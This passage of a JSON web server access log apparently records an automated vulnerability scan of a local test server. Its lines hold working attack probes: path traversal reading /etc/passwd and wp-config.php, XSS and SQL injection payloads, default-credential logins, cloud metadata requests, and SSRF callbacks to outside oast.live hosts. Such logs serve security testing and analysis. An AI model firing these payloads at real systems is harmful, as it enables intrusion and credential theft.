+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pdb/meta/v1/version HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.956","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.752","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.862","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.306","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.220","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.263","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.791","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"c9oms3gsmpve1ijt0mc0qmitqxzc1qzes.oast.live","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.805","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.412","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.478","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.408","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.472","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://c9oms3gsmpve1ijt0mc0yjqikry9dwm3a.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"{\x22username\x22:\x22nuclei_28fHqMZUb1oqYIAjxQOtmi6yvhR\x22,\x22password\x22:\x2228fHqPAZRPKUeT5A3ocTPsCxqMm\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"@c9oms3gsmpve1ijt0mc0u1wqo5i6qopak.oast.live","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.437","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.422","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-includes/ALFA_DATA/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.969","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.464","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.502","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET http://c9oms3gsmpve1ijt0mc03n7i3h1q9ork9.oast.live/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 